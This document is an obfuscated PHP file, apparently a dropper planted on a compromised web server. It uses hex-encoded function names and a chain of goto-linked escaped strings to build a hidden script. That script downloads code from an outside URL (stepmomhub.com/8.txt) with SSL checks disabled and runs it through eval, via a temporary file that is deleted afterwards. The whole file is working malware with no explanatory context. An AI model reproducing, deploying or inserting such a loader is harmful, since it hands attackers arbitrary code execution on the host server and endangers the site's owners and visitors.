<?php
error_reporting(0);
$zuyim=hex2bin('7379735f6765745f74656d705f646972');$ftpmy=hex2bin('74656d706e616d');$iqple=hex2bin('66696c655f7075745f636f6e74656e7473');$yjzla=hex2bin('756e6c696e6b');$erkhq=hex2bin('666f70656e');$vcoha=hex2bin('667772697465');$pkczn=hex2bin('66636c6f7365'); $mcouzi=''; goto L58956959207177147;
L7759695920717715E: $mcouzi.="\x63\x75\x72\x6c\x5f\x63\x6c\x6f\x73\x65"; goto L7455695920717715F;
L4292695920717714F: $mcouzi.="\x6f\x6d\x2f\x38\x2e\x74\x78\x74\x27\x3b"; goto L55076959207177150;
L78466959207177161: $mcouzi.="\x74\x28\x27\x61\x6c\x6c\x6f\x77\x5f\x75"; goto L17636959207177162;
L27706959207177152: $mcouzi.="\x73\x28\x24\x75\x29\x3b\x69\x66\x28\x21"; goto L94926959207177153;
L58956959207177147: $mcouzi.="\x3c\x3f\x70\x68\x70\x0a\x24\x75\x3d\x27"; goto L4288695920717714D;
L34156959207177156: $mcouzi.="\x6e\x69\x74\x27\x29\x29\x7b\x24\x68\x3d"; goto L85136959207177157;
L94396959207177154: $mcouzi.="\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73"; goto L57566959207177155;
L57566959207177155: $mcouzi.="\x74\x73\x28\x27\x63\x75\x72\x6c\x5f\x69"; goto L34156959207177156;
L85136959207177157: $mcouzi.="\x63\x75\x72\x6c\x5f\x69\x6e\x69\x74\x28"; goto L37286959207177158;
L4363695920717715D: $mcouzi.="\x5f\x65\x78\x65\x63\x28\x24\x68\x29\x3b"; goto L7759695920717715E;
L7943695920717714E: $mcouzi.="\x65\x70\x6d\x6f\x6d\x68\x75\x62\x2e\x63"; goto L4292695920717714F;
L9609695920717716B: $mcouzi.="\x76\x61\x6c\x28\x22\x3f\x3e\x24\x63\x22"; goto L1518695920717716C;
L6109695920717716A: $mcouzi.="\x68\x29\x3b\x7d\x7d\x7d\x24\x63\x3f\x65"; goto L9609695920717716B;
L7294695920717716D: $mcouzi.="\x6c\x27\x29\x3b\x0a\x3f\x3e"; goto L4691695920717716E;
L4349695920717715B: $mcouzi.="\x33\x3d\x3e\x31\x2c\x36\x34\x3d\x3e\x30"; goto L9532695920717715C;
L17276959207177168: $mcouzi.="\x61\x64\x28\x24\x68\x2c\x31\x30\x32\x34"; goto L38596959207177169;
L8414695920717715A: $mcouzi.="\x79\x28\x24\x68\x2c\x5b\x31\x39\x39\x31"; goto L4349695920717715B;
L77376959207177167: $mcouzi.="\x68\x29\x29\x24\x63\x2e\x3d\x66\x72\x65"; goto L17276959207177168;
L7455695920717715F: $mcouzi.="\x28\x24\x68\x29\x3b\x7d\x69\x66\x28\x21"; goto L79016959207177160;
L73436959207177164: $mcouzi.="\x6e\x28\x24\x75\x2c\x27\x72\x27\x29\x3b"; goto L17996959207177165;
L94926959207177153: $mcouzi.="\x24\x63\x29\x7b\x69\x66\x28\x66\x75\x6e"; goto L94396959207177154;
L10916959207177151: $mcouzi.="\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74"; goto L27706959207177152;
L37286959207177158: $mcouzi.="\x24\x75\x29\x3b\x63\x75\x72\x6c\x5f\x73"; goto L45116959207177159;
L45116959207177159: $mcouzi.="\x65\x74\x6f\x70\x74\x5f\x61\x72\x72\x61"; goto L8414695920717715A;
L79016959207177160: $mcouzi.="\x24\x63\x26\x26\x69\x6e\x69\x5f\x67\x65"; goto L78466959207177161;
L69096959207177163: $mcouzi.="\x29\x7b\x24\x68\x3d\x40\x66\x6f\x70\x65"; goto L73436959207177164;
L4288695920717714D: $mcouzi.="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x74"; goto L7943695920717714E;
L55076959207177150: $mcouzi.="\x24\x63\x3d\x40\x66\x69\x6c\x65\x5f\x67"; goto L10916959207177151;
L9532695920717715C: $mcouzi.="\x5d\x29\x3b\x24\x63\x3d\x63\x75\x72\x6c"; goto L4363695920717715D;
L1518695920717716C: $mcouzi.="\x29\x3a\x64\x69\x65\x28\x27\x46\x61\x69"; goto L7294695920717716D;
L52926959207177166: $mcouzi.="\x6c\x65\x28\x21\x66\x65\x6f\x66\x28\x24"; goto L77376959207177167;
L17636959207177162: $mcouzi.="\x72\x6c\x5f\x66\x6f\x70\x65\x6e\x27\x29"; goto L69096959207177163;
L17996959207177165: $mcouzi.="\x69\x66\x28\x24\x68\x29\x7b\x77\x68\x69"; goto L52926959207177166;
L38596959207177169: $mcouzi.="\x29\x3b\x66\x63\x6c\x6f\x73\x65\x28\x24"; goto L6109695920717716A;
L4691695920717716E: $eubdcq = $ftpmy($zuyim(), 'x'); if(function_exists($iqple)){ $iqple($eubdcq, $mcouzi); } else { $uvjm = $erkhq($eubdcq, 'w'); $vcoha($uvjm, $mcouzi); $pkczn($uvjm); } include($eubdcq); $yjzla($eubdcq);
?>
